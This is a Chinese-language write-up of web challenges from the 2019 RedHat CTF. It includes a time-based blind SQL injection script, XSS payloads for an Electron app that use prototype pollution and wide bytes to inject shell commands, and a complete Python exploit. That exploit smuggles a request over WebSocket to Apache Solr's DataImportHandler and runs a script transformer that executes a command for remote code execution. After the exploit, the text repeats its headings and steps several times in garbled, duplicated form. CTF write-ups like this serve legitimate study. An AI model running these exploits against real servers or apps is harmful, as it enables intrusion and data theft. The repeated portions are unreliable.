2019 redhat ctf的Apache Solr构造回显

前言

由于怎么题目没有做出了，因此总结的性质多一点。

0x01 easyweb

存在sql注入，注入点：

1	/?s=/Api/Lt/gbooklist&orderby=if(ascii(substr((select%20flaag%20from%20fl4g),{},1))={},sleep(6),1)%23

注入脚本

import requests
import sys
import string
flag = ''
url = sys.argv[1]
url = url.rstrip('/')
url = url+'?s=/Api/Lt/gbooklist&orderby=if(ascii(substr((select flaag from fl4g),{},1))={},sleep(6),1)%23'
for i in xrange(1,50):
    for j in xrange(45,127):
        try:
            a = requests.get(url.format(i,j),timeout=3)
        except:
            flag+=chr(j)
            print flag

0x02 Ticket—System

0x03 iCloudMusic

1. 首先寻找XSS,XSS的点很清晰就是`js_to_run`处的动态拼接js,header处用url.parse处理url.

2. fuzz所有unicode可以发现`\uff07`可以逃逸出单引号，因此只需要发送如下的url即可XSS.

3. 查看源码可以发现main.js中拦截了new-window事件，如果openExternal失败后会执行命令打开url,然而electron的window.open 默认通过浏览器a标签来处理，因此这里有两个解题思路:

1) 原形链污染覆盖a标签的getter.

1
2
3

var f=document.createElement('a');
f.__proto__.__defineGetter__('href',function(){return "http://xxxx.com＇%3B%00/?;$(open$IFS$9-a$IFS$9Calculator);#/asdasdasd%00%10"});
window.open('http://www.baidu.com');

2) 用一个更宽的字节。

1	open("http://xxxx.com%EF%BC%87;%00?;$(open$IFS$9-a$IFS$9Calculator);#/asdasdasd%00%10")

0x04 Bank—service

1. 打开网页后，查看源码可发现通过socket.io建立socket连接与后端交互。

2. 交互提示后台使用solr提供搜索服务，联系websocket猜测可能是websocket-smuggle

3. 访问/solr提示403，于是⽤用websocket-smuggle访问发现可正常访问。

4. 尝试命令执行行，无法外带，只能构造回显，参考 https://paper.seebug.org/1009/ ，可以尝试利利用 ContentStreamDataSource 构造回显，seebug的paper中没有给出poc因此需要参考solr文档构造回显

exp：

import socket

req1 = '''GET /socket.io/?transport=websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 1337
Upgrade: websocket

'''.replace('\n', '\r\n')


req2 = '''POST /solr/mail/dataimport?dataConfig=%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20/%3E%0A%3Cscript%3E%3C%21%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc%28row%29%7B%0A%20%20%20%20%20%20%20%20var%20j%3Dnew%20java.io.BufferedReader%28new%20java.io.InputStreamReader%28java.lang.Runtime.getRuntime%28%29.exec%28%22/readflag%22%29.getInputStream%28%29%29%29%3B%0A%20%20%20%20%20%20%20%20var%20line%3Dj.readLine%28%29%3B%0A%20%20%20%20%20%20%20%20var%20res%3D%22%22%3B%0A%20%20%20%20%20%20%20%20while%28line%21%3Dnull%20%26%26%20line%21%3Dundefined%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20res%3Dres%2Bline%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%3Dj.readLine%28%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%09%09row.put%28%22title_s%22%2Cres%29%3B%0A%09%09return%20row%3B%0A%09%7D%0A%20%20%5D%5D%3E%3C/script%3E%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22/books/book%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%20%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22res_s%22%20template%3D%22some%20static%20payload%22/%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title_s%22%20xpath%3D%22/books/book/name%22/%3E%0A%20%20%20%20%3C/entity%3E%0A%3C/document%3E%0A%3C/dataConfig%3E&command=full-import&debug=true HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/xml
X-Requested-With: XMLHttpRequest
Content-Length: 135
Connection: close
Referer: http://localhost:8983/solr/
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr

<?xml version="1.0" encoding="utf-8"?>
<books>
 <book>
 <name>NAME1</name>
 </book>
 <book>
<name>NAME2</name>
</book>
</books>
'''.replace('\n', '\r\n')


def main(netloc):
    host, port = netloc.split(':')

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, int(port)))

    sock.sendall(req1)
    data=sock.recv(4096)
    print data
    print '[+]connection finished'
    print req2
    sock.sendall(req2)
    data = sock.recv(409600)
    data = data.decode(errors='ignore')

    print data

    #sock.shutdown(socket.SHUT_RDWR)
    sock.close()


if __name__ == "__main__":
main('127.0.0.1:3000')

2019 redhat ctf的Apache Solr构造回显

前言

0x01 easyweb

存在sql注入，注入点：

注入脚本

0x02 Ticket—System

0x03 iCloudMusic

1. 首先寻找XSS,XSS的点很清晰就是`js_to_run`处的动态拼接js,header处用url.parse处理url.

2. fuzz所有unicode可以发现`\uff07`可以逃逸出单引号，因此只需要发送如下的url即可XSS.

3. 查看源码可以发现main.js中拦截了new-window事件，如果openExternal失败后会执行命令打开url,然而electron的window.open 默认通过浏览器a标签来处理，因此这里有两个解题思路:

1) 原形链污染覆盖a标签的getter.

2) 用一个更宽的字节。

0x04 Bank—service

1. 打开网页后，查看源码可发现通过socket.io建立socket连接与后端交互。

2. 交互提示后台使用solr提供搜索服务，联系websocket猜测可能是websocket-smuggle

3. 访问/solr提示403，于是⽤用websocket-smuggle访问发现可正常访问。

4. 尝试命令执行行，无法外带，只能构造回显，参考 https://paper.seebug.org/1009/ ，可以尝试利利用 ContentStreamDataSource 构造回显，seebug的paper中没有给出poc因此需要参考solr文档构造回显

exp：

参考资料

https://github.com/0ang3el/websocket-smuggle

前言

0x01 easyweb

存在sql注入，注入点：

注入脚本

0x02 Ticket—System

0x03 iCloudMusic

1. 首先寻找XSS,XSS的点很清晰就是js_to_run处的动态拼接js,header处用url.parse处理url.

2. fuzz所有unicode可以发现\uff07可以逃逸出单引号，因此只需要发送如下的url即可XSS.

3. 查看源码可以发现main.js中拦截了new-window事件，如果openExternal失败后会执行命令打开url,然而electron的window.open 默认通过浏览器a标签来处理，因此这里有两个解题思路:

1) 原形链污染覆盖a标签的getter.

2) 用一个更宽的字节。

0x04 Bank—service

1. 打开网页后，查看源码可发现通过socket.io建立socket连接与后端交互。

2. 交互提示后台使用solr提供搜索服务，联系websocket猜测可能是websocket-smuggle

3. 访问/solr提示403，于是⽤用websocket-smuggle访问发现可正常访问。

4. 尝试命令执行行，无法外带，只能构造回显，参考 https://paper.seebug.org/1009/ ，可以尝试利利用 ContentStreamDataSource 构造回显，seebug的paper中没有给出poc因此需要参考solr文档构造回显

exp：

参考资料

https://github.com/0ang3el/websocket-smuggle

1. 首先寻找XSS,XSS的点很清晰就是`js_to_run`处的动态拼接js,header处用url.parse处理url.

2. fuzz所有unicode可以发现`\uff07`可以逃逸出单引号，因此只需要发送如下的url即可XSS.